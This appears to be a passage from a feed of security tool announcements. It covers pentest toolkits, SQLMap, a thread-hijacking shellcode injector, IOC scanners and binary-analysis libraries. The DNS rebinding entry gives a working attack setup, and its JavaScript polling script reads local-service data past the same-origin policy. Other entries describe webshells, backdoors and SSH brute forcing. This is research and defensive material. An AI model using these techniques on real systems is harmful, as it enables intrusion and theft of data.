      # INSTALLDIR = where you want to install Lockdoor (Ex : /opt/sofiane/pentest)
      echo "Location:"$installdir > $HOME"/.config/lockdoor/lockdoor.conf"
      # Moving the resources folder
      mv ToolsResources/* INSTALLDIR
      # Installing Lockdoor from PyPi
      pip3 install lockdoor
  • Docker Installation
    COMING SOON

Lockdoor Tools contents:

Information Gathering:
  • Tools:
    • dirsearch : A Web path scanner
    • brut3k1t : security-oriented bruteforce framework
    • gobuster : DNS and VHost busting tool written in Go
    • Enyx : an SNMP IPv6 Enumeration Tool
    • Goohak : Launchs Google Hacking Queries Against A Target Domain
    • Nasnum : The NAS Enumerator
    • Sublist3r : Fast subdomains enumeration tool for penetration testers
    • wafw00f : identify and fingerprint Web Application Firewall
    • Photon : ncredibly fast crawler designed for OSINT.
    • Raccoon : offensive security tool for reconnaissance and vulnerability scanning
    • DnsRecon : DNS Enumeration Script
    • Nmap : The famous security Scanner, Port Scanner, & Network Exploration Tool
    • sherlock : Find usernames across social networks
    • snmpwn : An SNMPv3 User Enumerator and Attack tool
    • Striker : an offensive information and vulnerability scanner.
    • theHarvester : E-mails, subdomains and names Harvester
    • URLextractor : Information gathering & website reconnaissance
    • denumerator.py : Enumerates list of subdomains
    • other : other Information gathering,recon and Enumeration scripts I collected somewhere.
  • Frameworks:
    • ReconDog : Reconnaissance Swiss Army Knife
    • RED_HAWK : All in one tool for Information Gathering, Vulnerability Scanning and Crawling
    • Dracnmap : Info Gathering Framework

Web Hacking:
  • Tools:
    • Spaghetti : Spaghetti - Web Application Security Scanner
    • CMSmap : CMS scanner
    • BruteXSS : BruteXSS is a tool to find XSS vulnerabilities in web application
    • J-dorker : Website List grabber from Bing
    • droopescan : scanner , identify , CMSs , Drupal , Silverstripe.
    • Optiva : Web Application Scanne
    • V3n0M : Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
    • AtScan : Advanced dork Search & Mass Exploit Scanner
    • WPSeku : Wordpress Security Scanner
    • Wpscan : A simple Wordpress scanner written in python
    • XSStrike : Most advanced XSS scanner.
    • Sqlmap : automatic SQL injection and database takeover tool
    • WhatWeb : the Next generation web scanner
    • joomscan : Joomla Vulnerability Scanner Project
  • Frameworks:
    • Dzjecter : Server checking Tool

Privilege Escalation:
  • Tools:
    • Linux:
      • Scripts:
        • linux_checksec.sh
        • linux_enum.sh
        • linux_gather_files.sh
        • linux_kernel_exploiter.pl
        • linux_privesc.py
        • linux_privesc.sh
        • linux_security_test
      • Linux_exploits folder
    • Windows :
      • windows-privesc-check.py
      • windows-privesc-check.exe
    • MySql:
      • raptor_udf.c
      • raptor_udf2.c

Reverse Engineering:
  • Radare2 : unix-like reverse engineering framework
  • VirtusTotal : VirusTotal tools
  • Miasm : Reverse engineering framework
  • Mirror : reverses the bytes of a file
  • DnSpy : .NET debugger and assembly
  • AngrIo : A python framework for analyzing binaries ( Suggested by @Hamz-a )
  • DLLRunner : a smart DLL execution script for malware analysis in sandbox systems.
  • Fuzzy Server : a Program That Uses Pre-Made Spike Scripts to Attack VulnServer.
  • yara : a tool aimed at helping malware researchers toidentify and classify malware samples
  • Spike : a protocol fuzzer creation kit + audits
  • other : other scripts collected somewhere

Exploitation:
  • Findsploit : Find exploits in local and online databases instantly
  • Pompem : Exploit and Vulnerability Finder
  • rfix : Python tool that helps RFI exploitation.
  • InUrlBr : Advanced search in search engines
  • Burpsuite : Burp Suite for security testing & scanning.
  • linux-exploit-suggester2 : Next-Generation Linux Kernel Exploit Suggester
  • other : other scripts I collected somewhere.

Shells:
  • WebShells : BlackArch's Webshells Collection
  • ShellSum : A defense tool - detect web shells in local directories
  • Weevely : Weaponized web shell
  • python-pty-shells : Python PTY backdoors

Password Attacks:
  • crunch : a wordlist generator
  • CeWL : a Custom Word List Generator
  • patator : a multi-purpose brute-forcer, with a modular design and a flexible usage

Encryption - Decryption:
  • Codetective : a tool to determine the crypto/encoding algorithm used
  • findmyhash : Python script to crack hashes using online services

Social Engineering:
  • scythe : an accounts enumerator

Lockdoor Resources contents:

Information Gathering:

Crypto:

Exploitation:

Networking:

Password Attacks:

Post Exploitation:

Privilege Escalation:

Pentesting & Security Assessment Findings Report Templates:

Reverse Engineering:

Social Engineering:

Walk Throughs:

Web Hacking:

Other:

Contributing
  1. Fork it ( https://github.com/SofianeHamlaoui/Lockdoor-Framework/fork )
  2. Create your feature branch
  3. Commit your changes
  4. Push to the branch
  5. Create a new Pull Request



GiveMeSecrets - Use Regular Expressions To Get Sensitive Information From A Given Repository (GitHub, Pip Or Npm)

$
0
0
Use regular expressions to get sensitive information from a given repository (GitHub, pip or npm).

Dependencies
You only need to have python 3.6 or higher installed to launch this script. In addition you must have installed in the system git, pip and npm.

How to use
It's very easy to use, just run the script and pass the option (1- GitHub; 2 - pip; 3 - npm) and the repository. Example:
python3 give_me_secrets.py --option 1 --repo https://github.com/Josue87/BoomER.git   
Spanish post in Boomernix.com

Author
Josué Encinar @JosueEncinar


SQLMap v1.3.10 - Automatic SQL Injection And Database Takeover Tool

$
0
0

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.

Demo

Links

Translations


ThreadBoat - Program Uses Thread Execution Hijacking To Inject Native Shellcode Into A Standard Win32 Application

$
0
0

Program uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application.

With Thread Hijacking, it allows the hijacker.exe program to suspend a thread within the target.exe program allowing us to write shellcode to a thread.

Usage
int main()
{
System sys;
Interceptor incp;
Exception exp;

sys.returnVersionState();
if (sys.returnPrivilegeEscalationState())
{
std::cout << "Token Privileges Adjusted\n";
}

if (DWORD m_procId = incp.FindWin32ProcessId((PCHAR)m_win32ProcessName))
{
incp.ExecuteWin32Shellcode(m_procId);
}

system("PAUSE");
return 0;
}

Environment
  • Windows Vista+
  • Visual C++

Libs
  • Winapi
    • user32.dll
    • kernel32.dll
  • ntdll.dll


ManaTI - A Web-Based Tool To Assist The Work Of The Intuitive Threat Analysts

$
0
0

Machine Learning for Threat Intuitive Analysis
The goal of the ManaTI project is to develop machine learning techniques to assist an intuitive threat analyst to speed the discovery of new security problems. The machine learning will contribute to the analysis by finding new relationships and inferences. The project will include the development of a web interface for the analyst to interact with the data and the machine learning output.
This project is partially supported by Cisco Systems. For more information about the project please go to Stratosphere Lab page.

Stable Versions
  • Mon Sep 3 12:24:26 CEST 2018: Version 0.12.0a
  • Sun Aug 12 16:21:19 CEST 2018: Version 0.11.0a
  • Mon Jan 29 00:07:15 CEST 2018: Version 0.9.0a
  • Fri Nov 10 19:16:52 CEST 2017: Version 0.8.0.537a
  • Fri Mar 31 12:19:00 CEST 2017: Version 0.7.1
  • Sun Mar 5 00:04:41 CEST 2017: Version 0.7
  • Thu Nov 10 12:30:45 CEST 2016: Version 0.6.2.1
  • Wed Oct 12 21:19:21 CEST 2016: Version 0.5.1
  • Wed Sep 21 17:56:40 CEST 2016: Version 0.41
  • Tue Sep 13 10:52:36 CEST 2016: Version 0.4
  • Thu Aug 18 15:44:31 CEST 2016: Version 0.3
  • Wed Jun 29 10:44:15 CEST 2016: Version 0.2

Authors

Installation
ManaTI is a Django project with a Postgres database and it works in Linux and MacOS. We recommend using a virtualenv environment to setup it. The installation steps for linux are:
    sudo apt-get update ; sudo apt-get upgrade -y
  1. Clone the repository
  2.     git clone git@github.com:stratosphereips/Manati.git; cd Manati
      or if you don't want to use SSH, use HTTPS
        git clone https://github.com/stratosphereips/Manati.git; cd Manati
  3. Install Virtualenv to isolate the required python libraries for ManaTI, also will be installed python libraries for development
  4.     sudo apt-get install virtualenv python-pip python-dev libpq-dev build-essential libssl-dev libffi-dev
  5. Create virtualenv folder
  6.     virtualenv .vmanati
  7. Active Virtualenv
  8.     source .vmanati/bin/activate
  9. Install PostgreSQL DB engine
  10.     sudo apt-get install postgresql-server-dev-all postgresql-9.5 postgresql-client-9.5
  11. Create environment variables files. Copy and rename the files .env.example to .env, and .env-docker.example to .env-docker
  12.     cp .env.example .env
    cp .env-docker.example .env-docker
    OPTIONAL
    You can modify the password and name of database, if you want. Remember, reflect the changes in the Postgres database settings below.
  13. Install required python libraries
  14.     pip install -r requirements/local.txt
      Maybe you will have some issues with permission in the folder ~/.cache, just perform the next command and problem solved:
           sudo chmod 777 ~/.cache
    if you deploy to Amazon AWS EC2 and you have a memory error try:
        pip install -r requirements/local.txt --no-cache-dir
  15. Start postgresql
  16.     sudo /etc/init.d/postgresql start

    Configure the database
  17. As root: (There should be a user postgres after installing the database)
  18.     su - postgres
  19. Create the database:
  20.     psql

    create user manati_db_user with password 'password';

    create database manati_db;

    grant all privileges on database manati_db to manati_db_user;

    alter role manati_db_user createrole createdb;

    CTRL-D (to output the postgres db shell)
    OPTIONAL
    To change the password by default of the postgres user (you can put the same password if you want), specially good idea if you want to use pgAdmin3-4 as a postgres client. Remember don't exit of "sudo - postgres"
        psql

    \password;

    CTRL-D (to output the postgres db shell)

    Verify that the db was created successfully
  21. As the postgres user
  22.     psql -h localhost -d manati_db -U manati_db_user

    (and put the password)
    After putting the password you should be logged in in the postgres.
  23. Install redis-server
  24.     sudo apt-get install redis-server
    OPTIONAL
    If you want to configure the Redis. For example, you are interested to change the password, you can:
        sudo vi /etc/redis/redis.conf
    and find the line requirepass and write next it the password that you want.
        requirepass passwodUser
    Just remember to update the variable environment REDIS_PASSWORD in the file .env in the root of the project.
  25. Run migrate files
  26.     python ./manage.py makemigrations guardian
    python ./manage.py migrate
  27. Registering External modules. You must run this command everytime you add or remove an External Module
  28.      python ./manage.py check_external_modules
  29. Execute redis_worker.sh file (in background '&' or in another console).
  30.     ./utility/redis_worker.sh
  31. Create super user for login in the web system if you need
  32.     python manage.py createsuperuser

    How to run it
    It is not recommended to run the server as root, but since only root can open ports numbers less than 1024, it is up to you which user you use. By default it opens the port 8000, so you can run it as root:
    python ./manage.py runserver
    After this, just open your browser in http://localhost:8000/manati_project/manati_ui
    If you want to open the server in the network, you can do it with:
    python ./manage.py runserver <ip-address>:8000
If you want to see the jobs running or enqueued go to http://localhost:8000/manati_project/django-rq/

Settings: Updating version from master
  1. Open project directory
  2. cd path/to/project_directory
  3. Pull the last changes from master
  4. git pull origin master
  5. Install las libraries installed
  6. pip install -r requirements/local.txt
  7. Install redis-server and execute redis_worker.sh file (in background '&' or in another console)
  8. ./utility/redis_worker.sh
  9. Prepare migrations files for guardian library (if it already has, nothings happens)
  10. python ./manage.py makemigrations guardian --noinput
  11. Execute migrations files
  12. python ./manage.py migrate --noinput
  13. Registering External modules. You must run this command everytime you add or remove an External Module
  14. python ./manage.py check_external_modules
  15. Execute server
  16. python ./manage.py runserver

Run in production.
Using surpevisor, gunicorn as server with RQ worker (with redis server) to deal with the background tasks. In the future we are planning to prepare settings for nginx
cd path/to/project_directory 
python manage.py collectstatic --noinput --clear
sudo supervisord -c supervisor-manati.conf -n

Docker image
If you have docker installed, maybe can be a good idea install the ManaTI docker image. The Dockerfile and server configurations files are here. This ManaTI docker image is executed over a server NGINX and uWSGI. This image is maintained by @Piuliss
docker pull honeyjack/manati:latest
docker run --name manati -p 8888:8888 -dti honeyjack/manati:latest bash
Then, wait for 5 or 10 seconds and go to http://localhost:8888

Docker Composer
If you don't want to waste time installing ManaTI and you have docker installed, you can just execute docker-compose. First clone the repository and go to the directory project.
cd Manati
cp .env.example .env
cp .env-docker.example .env-docker
docker-compose build
docker-compose run web bash -c "python manage.py makemigrations --noinput; python manage.py migrate; python manage.py check_external_modules"
docker-compose run web bash -c "python manage.py createsuperuser2 --username admin --password Password123 --noinput --email 'admin@manatiproject.com'"
docker-compose up # or 'docker-compose up -d' if you don't want to see the logs in the console.
After this, just open your browser in http://localhost:8000/manati_project/manati_ui/new

Backup DB
pg_dump -U manati_db_user -W -F p manati_db > backup.sql # plain text

Restore DB
psql manati_db -f backup.sql -U manati_db_user



Fenrir - Simple Bash IOC Scanner

$
0
0

Fenrir is a simple IOC scanner bash script. It allows scanning Linux/Unix/OSX systems for the following Indicators of Compromise (IOCs):
  • Hashes
    MD5, SHA1 and SHA256 (using md5sum, sha1sum, sha -a 256)
  • File Names
    string - checked for substring of the full path, e.g. "temp/p.exe" in "/var/temp/p.exe"
  • Strings
    grep in files
  • C2 Server
    checking for C2 server strings in 'lsof -i' and 'lsof -i -n' output
  • Hot Time Frame
    using stat in different modes - define min and max epoch time stamp and get all files that have been created in between
Basic characteristics:
  • Bash Script
  • No installation or agent needed
  • Uses common tools to extract attributes (e.g. md5sum, grep, stat in different modes)
  • Intended to run on any Linux / Unix / OS X with Bash
  • Low footprint - Ansible playbook with RAM drive solution
  • Smart exclusions (file size, extension, certain directories) speeds up the scan process

Why Fenrir?
FENRIR is the 3rd tool after THOR and LOKI. THOR is our full featured APT Scanner with many modules and export types for corporate customers. LOKI is a free and open IOC scanner that uses YARA as signature format.
The problem with both predecessors is that both have certain requirements on the Linux platform. We build THOR for a certain Linux version in order to match the correct libc that is required by the YARA module. LOKI requires Python and YARA installed on Linux to run.
We faced the problem of checking more than 100 different Linux systems for certain Indicators of Compromise (IOCs) without installing an agent or software packages. We already had an Ansible playbook for the distribution of THOR on a defined set of Linux remote systems. This playbook creates a RAM drive on the remote system, copies the local program binary to the remote system, runs it and retrieves the logs afterwards. This ensures that the program's footprint on the remote system is minimal. I adapted the Ansible playbook for Fenrir. (it is still untested)
Fenrir is still 'testing'. Please report back errors (and solutions) via the "Issues" section here on github.
If you find a better / more solid / less error-prone solution to the evaluations in the script, please report them back. I am not a full-time bash programmer so I'd expect some room for improvement.

Usage
Usage: ./fenrir.sh DIRECTORY

DIRECTORY - Start point of the recursive scan
All settings can be configured in the header of the script.


Step by Step
What Fenrir does is:
  • Reads the IOC files
  • Takes a parameter as starting directory for the recursive walk
  • Checks C2 servers in lsof output
  • Checks for directory exclusions (configurable in the script header)
  • Checks for certain file extensions to check (configurable in the script header)
  • Checks the file name (full path) for matches in IOC files
  • Checks for file size exclusions (configurable in the script header)
  • Checks for certain strings in the file (via grep)
  • Checks for certain hash values
  • Checks for change/creation time stamp

Screenshots
Scan Run showing the different match types on a demo directory.


Detect C2 connections


Detect strings in GZIP packed log files


Configuration


Ansible Playbook


Stat issue (regarding the CREATED file stamp on Linux file systems)


Contact
via Twitter @Cyb3rOps


DNS Rebinding Tool - DNS Rebind Tool With Custom Scripts

$
0
0


Inspired by @tavisio
This project is meant to be an All-in-one Toolkit to test further DNS rebinding attacks and my take on understanding these kind of attacks. It consists of a web server and pseudo DNS server that only responds to A queries.

The root index of the web server allowes to configure and run the attack with a rudimentary web gui. See dnsrebindtool.43z.one.
A basic nginx config to host the web server
server {
listen 80;
server_name dnsrebindtool.43z.one;

location / {
proxy_pass http://localhost:5000;
}
}
The /attack route of the web server reads the GET parameter script that should provide basic64 encoded javascript and responds with the decoded code (wraped around a setTimeout) embeded in a regular HTML page.
% curl "http://dnsrebindtool.43z.one/attack?script=YWxlcnQoMSk=" 
<html>
<script>

setTimeout(function(){
alert(1)
}, 3000)

</script>
</html
Within my registrar for the domain 43z.one I setup a NS record for the subdomain rebind to point to the IP where this tool is hosted.
ns       A   81.4.124.10
rebind NS ns.43z.one
The DNS server responds only to A queries in this format
evcmxfm4g . 81-4-124-10 . 127-0-0-1 .rebind.43z.one
The first part (subdomain) is just some random id and should be generated for every attack session (the web gui does this on every reload). Second comes the IP the DNS server should respond for the next 2 seconds and third the IP the server should respond after that time is passed.
$ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one 
Fri Feb 2 21:18:20 CET 2018
Server: 8.8.8.8
Address: 8.8.8.8#53

Non-authoritative answer:
Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Address: 81.4.124.10

$ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Fri Feb 2 21:18:23 CET 2018
Server: 8.8.8.8
Address: 8.8.8.8#53

Non-authoritative answer:
Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
Address: 127.0.0.1
The last missing peace is a nginx config for the rebind domains. Only the /attack route should be passed to the tool others should respond with an error. This allows to attack other services on port 80 with all routes but /attack. (like /api/monitoring/stats a endpoint my router exposes)
server {
listen 80;
server_name *.rebind.43z.one;

location / {
return 404;
}

location /attack {
proxy_pass http://localhost:5000/attack;
}
}
DNS Cache Eviction
var xhr = new XMLHttpRequest()
xhr.open('GET', 'czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)
xhr.send()
// first time the browser sees this domain it queries the dns server
// and gets 81.4.124.10

// sleep for more than 2 sec

xhr.open('GET', 'czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)
xhr.send()
// still uses 81.4.124.10 (AND NOT 127.0.0.1)
// NO dns query happened browser used cached IP
This is a problem for this kind of attack. In order to work the browser has to reissue a new dns query to get the second IP. In theory if you just wait long enough between the requests a new query should happen. My tests show though there is a faster but more aggressive approach. It could be very likely this is setup specific. Needs more testing I used the following script to measure the optimum value for the WAIT variable. Tested on Chromium 62.0.3202.89 running on Debian buster/sid.
var WAIT = 200
var start = Date.now()

var interval = setInterval(function(){
var xhr = new XMLHttpRequest()
xhr.open('GET', '//' + $REBIND_DOMAIN, false)

xhr.send()

if(xhr.status == 200){
document.body.innerHTML = (Date.now() - start)/1000
document.body.innerHTML += xhr.responseText
clearInterval(interval)
return
}
}, WAIT)
WAIT value in msrequests chrome sendsTime until queries dns again
070060
1070060
10060063
12050063
15040063
18040075
20030063
22030069
25030078
28030087
30020063
32020067
34020071
36020075
38020079
40020083
1000100103
I started a new repo just to explore this dns cache eviction tester
Putting it all together and test it.
echo -e "HTTP/1.1 200 OK\n\n TOPSECRET" | sudo nc -lvp 80 -q1 127.0.0.1
This netcat instance serves some content I would like to get access to. I keep the default rebind domain
$RANDOM$.81-4-124-10.127-0-0-1.rebind.43z.one and default script
var start = Date.now()

var interval = setInterval(function(){
var xhr = new XMLHttpRequest()
xhr.open('GET', '//' + $REBIND_DOMAIN, false)

xhr.send()

if(xhr.status == 200){
document.body.innerHTML = (Date.now() - start)/1000
document.body.innerHTML += xhr.responseText
clearInterval(interval)
return
}
}, 200)
on dnsrebindtool.43z.one and hit the Attack button. Open the dev tools network tab to see what is happening in the background. For me after about 60 seconds fills up with the string TOPSECRET and the time it took. DNS rebinding circumvented SOP. To get the breached data out of the iframe one could use Window.PostMessage() or include code that forwards the data to another attacker server within the script itself.


Userrecon-Py v2.0 - Username Recognition On Various Websites

$
0
0

Username recognition on various websites.

Installation

With pip3
# Linux
sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git --upgrade
userrecon-py --help

Build from source
# Linux
git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-py
sudo -H pip3 install -r requirements.txt
python3 setup.py build
sudo python3 setup.py install

Usage
Start by printing the available actions by running userrecon-py --help. Then you can perform the following tests:
# print all results.
userrecon-py target decoxviii --all -o test


# print positive results.
userrecon-py target decoxviii --positive -o test


# print negative results.
userrecon-py target decoxviii --negative -o test

decoxviii
MIT



B2R2 - Collection Of Useful Algorithms, Functions, And Tools For Binary Analysis

$
0
0

B2R2 is a collection of useful algorithms, functions, and tools for binary analysis, written purely in F# (in .NET lingo, it is purely managed code). B2R2 has been named after R2-D2, a famous fictional robot appeared in the Star Wars. In fact, B2R2's original name was B2-R2, but we decided to use the name B2R2 instead, because .NET does not allow dash (-) characters in identifiers (or namespaces). The name essentially represents "binary" or "two": "binary" itself means "two" states anyways. "B" and "2" mean "binary", and "R" indicates reversing.

B2R2?
  1. B2R2 is analysis-friendly: it is written in F#, which provides all the syntactic goodies for writing program analyzers, such as pattern matching, algebraic data types, and etc.
  2. B2R2 is fast: it has a fast and efficient front-end engine for binary analysis, which is written purely in a functional way. Therefore, it naturally supports pure parallelism for binary disassembling, lifting and IR optimization.
  3. B2R2 is easy to play with: there is absolutely no dependency hell for B2R2 because it is a fully-managed library. All you need to do is to install .NET Core SDK, and you are ready to go! Native IntelliSense support is another plus!
  4. B2R2 is OS-Independent: it works on Linux, Mac, Windows, and etc. as long as .NET core supports it.
  5. B2R2 is interoperable: it is not bound to a specific language. Theoretically, you can use B2R2 APIs with any CLI supported languages.

Features?
Currently, our focus is on the front-end of binary analysis, which includes binary parser, lifter, and optimizer. B2R2 natively supports parallel lifting, which is a new technique we introduced in 2019 NDSS Bar. Please refer to our paper for more details about the technique as well as our design decisions. We also have our own back-end tools such as symbolic executor, but we are not planning to open-source them yet. Nevertheless, B2R2 includes several useful middle-end or back-end features such as ROP chain compilation, CFG building, and automatic graph drawing, and etc. B2R2 also comes with a simple command-line utility that we call BinExplorer, which can help explore such features using a simple command line interface.

Dependencies?
B2R2 relies on a tiny set of external .NET libraries, and our design principle is to use a minimum number of libraries. Below is a list of libraries that we leverage.

API Documentation
We currently use docfx to generate our documentation: https://b2r2.org/APIDoc/

Example
Let's try to use B2R2 APIs.
  1. First we create an empty directory DIRNAME:
    mkdir DIRNAME
  2. We then create an empty console project with dotnet command line:
    $ dotnet new console -lang F#
  3. Add our nuget package B2R2.FrontEnd to the project:
    $ dotnet add package B2R2.FrontEnd
  4. Modify the Program.fs file with your favorite editor as follows:
    open B2R2
    open B2R2.FrontEnd

    [<EntryPoint>]
    let main argv =
    let isa = ISA.OfString "amd64"
    let bytes = [| 0x65uy; 0xffuy; 0x15uy; 0x10uy; 0x00uy; 0x00uy; 0x00uy |]
    let handler = BinHandler.Init (isa, bytes)
    let ins = BinHandler.ParseInstr handler 0UL
    ins.Translate handler.TranslationContext |> printfn "%A"
    0
  5. We then just run it by typing: dotnet run. You will be able see lifted IR statements from your console. That's it! You just lifted an Intel instruction with only few lines of F# code!

Build
Building B2R2 is fun and easy. All you need to do is to install .NET Core SDK 3.0 or above. Yea, that's it!
  • To build B2R2 in release mode, type make release or dotnet build -c Release in the source root.
  • To build B2R2 in debug mode, type make, or dotnet build in the source root.
For your information, please visit the official web site of F# to get more tips about installing the development environment for F#: http://fsharp.org/.

Why Reinventing the Wheel?
There are many other great tools available, but we wanted to build a functional-first binary analysis platform that is painless to install and runs on any platform without any hassle. B2R2 is in its infancy stage, but we believe it provides a rich set of library functions for binary analysis. It also has a strong front-end that is easily adaptable and extendible! Currently it reliably supports x86 and x86-64, meaning that we have heavily tested them; and it partially supports ARMv7 (and Thumb), ARMv8, MIPS32, and MIPS64, meaning that they work, but we haven't tested them thorougly yet.

Features to be Added?
Below is a list of features that we plan to add in the future: the list is totally incomplete. Some of them are work in progress, but we look forward your contributions! Feel free to write a PR (Pull Requst) while making sure that you have read our contribution guideline.
  • Implement CFG recovery algorithms.
  • Implement assembler for currently supported ISAs using a parser combinator.
  • Support for floating point operations.
  • Support for more architectures such as PPC.

Credits
Members in SoftSec Lab. @ KAIST developed B2R2 in collaboration with Cyber Security Research Center (CSRC) at KAIST. See Authors for the full list.


Tarnish - A Chrome Extension Static Analysis Tool To Help Aide In Security Reviews

$
0
0

tarnish is a static-analysis tool to aid researchers in security reviews of Chrome extensions. It automates much of the regular grunt work and helps you quickly identify potential security vulnerabilities. This tool accompanies the research blog post which can be found here. If you don't want to go through the trouble of setting this up you can just use the tool at https://thehackerblog.com/tarnish/.

Unpolished Notice & Notes
It should be noted that this is an un-polished release. This is the same source as the deployment located at https://thehackerblog.com/tarnish/. In the future I may clean this up and make it much easier to run but I don't have time right now.
To set this up you'll need to understand how to:
  • Configure an S3 bucket
  • (if using auto-scaling) Set up ElasticBeanstalk
  • Use docker-compose
  • Set up redis
The set up is a little complex due to a few design goals:
  • Effectively perform static against Chrome extensions
  • Automatically scale up to increased workload with more instances and scale down.
  • Work on a shoestring budget (thus the use of ElasticBeanstalk with Spot Instances).
Some quick notes to help someone attempting to set this up:
  • tarnish makes use of Python Celery for analysis of extensions.
  • The Python Celery config uses redis as a broker (this will have to be created).
  • The workers which process extension analysis jobs run on AWS ElasticBeanstalk spot instances. For those unfamiliar, spot instances are basically bidding on unused compute. This allows the service to run super cheaply.
  • The workers require at least an AWS t2.medium instance to operate.
  • The tarnish frontend is just a set of static files which is upload to a static web host configured S3 bucket.
See the docker-compose.yaml.example for the environment variable configs. Ideally you'd run ./start.sh and navigate to the static frontend to get things running. You can use S3 for the static site or just a simple static webserver like python -m SimpleHTTPServer (you'll have to modify the JavaScript files to ensure origin matches, etc.

Features
Pulls any Chrome extension from a provided Chrome webstore link.
  • manifest.json viewer: simply displays a JSON-prettified version of the extension’s manifest.
  • Fingerprint Analysis: Detection of web_accessible_resources and automatic generation of Chrome extension fingerprinting JavaScript.
  • Potential Clickjacking Analysis: Detection of extension HTML pages with the web_accessible_resources directive set. These are potentially vulnerable to clickjacking depending on the purpose of the pages.
  • Permission Warning(s) viewer: which shows a list of all the Chrome permission prompt warnings which will be displayed upon a user attempting to install the extension.
  • Dangerous Function(s): shows the location of dangerous functions which could potentially be exploited by an attacker (e.g. functions such as innerHTML, chrome.tabs.executeScript).
  • Entry Point(s): shows where the extension takes in user/external input. This is useful for understanding an extension’s surface area and looking for potential points to send maliciously-crafted data to the extension.
  • Both the Dangerous Function(s) and Entry Point(s) scanners have the following for their generated alerts:
    • Relevant code snippet and line that caused the alert.
    • Description of the issue.
    • A “View File” button to view the full source file containing the code.
    • The path of the alerted file.
    • The full Chrome extension URI of the alerted file.
    • The type of file it is, such as a Background Page script, Content Script, Browser Action, etc.
    • If the vulnerable line is in a JavaScript file, the paths of all of the pages where it is included as well as these page’s type, and web_accessible_resource status.
  • Content Security Policy (CSP) analyzer and bypass checker: This will point out weaknesses in your extension’s CSP and will also illuminate any potential ways to bypass your CSP due to whitelisted CDNs, etc.
  • Known Vulnerable Libraries: This uses Retire.js to check for any usage of known-vulnerable JavaScript libraries.
  • Download extension and formatted versions.
  • Download the original extension.
  • Download a beautified version of the extension (auto prettified HTML and JavaScript).
  • Automatic caching of scan results, running an extension scan will take a good amount of time the first time you run it. However the second time, assuming the extension hasn’t been updated, will be almost instant due to the results being cached. Linkable Report URLs, easily link someone else to an extension report generated by tarnish.


Penta - Open Source All-In-One CLI Tool To Automate Pentesting

$
0
0




Penta is is Pentest automation tool using Python3.
(Future!) It provides advanced features such as metasploit and nexpose to extract vuln info found on specific servers.


Installation

Install requirements
penta requires the following packages.
  • Python3.7
  • pipenv
Resolve python package dependency.
$ pipenv install
If you dislike pipenv...
$ pip install -r requirements.txt

Usage
$ pipenv run start <options>
If you dislike pipenv...
$ python penta/penta.py

Usage: List options
$ pipenv run start -h
usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]

Penta is Pentest automation tool

optional arguments:
-h, --help show this help message and exit
-target TARGET Specify target IP / domain
-ports PORTS Please, specify the target port(s) separated by comma.
Default: 21,22,25,80,110,443,8080
-proxy PROXY Proxy[IP:PORT]

Usage: Main menu
[ ] === MENU LIST ===========================================
[0] EXIT
[1] Port scanning Default: 21,22,25,80,110,443,8080
[2] Nmap & vuln scanning
[3] Check HTTP option methods
[4] Grab DNS server info
[5] Shodan host search
[6] FTP connect with anonymous
[7] SSH connect with Brute Force
[99] Change target host
  1. Port scanning
    To check ports for a target. Log output supported.
  2. Nmap
    To check ports by additional means using nmap
  3. Check HTTP option methods
    To check the methods (e.g. GET,POST) for a target.
  4. Grab DNS server info
    To show the info about DNS server.
  5. Shodan host search To collect host service info from Shodan. Request Shodan API key to enable the feature.
  6. FTP connect with anonymous To check if it has anonymous access activated in port 21. FTP users can authenticate themselves using the plain text sign-in protocol (Typically username and password format), but they can connect anonymously if the server is configured to allow it. Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.
  7. SSH connect with Brute Force To check ssh connection to scan with Brute Force. Dictionary data is in data/dict.


FATT - A Script For Extracting Network Metadata And Fingerprints From Pcap Files And Live Network Traffic

$
0
0

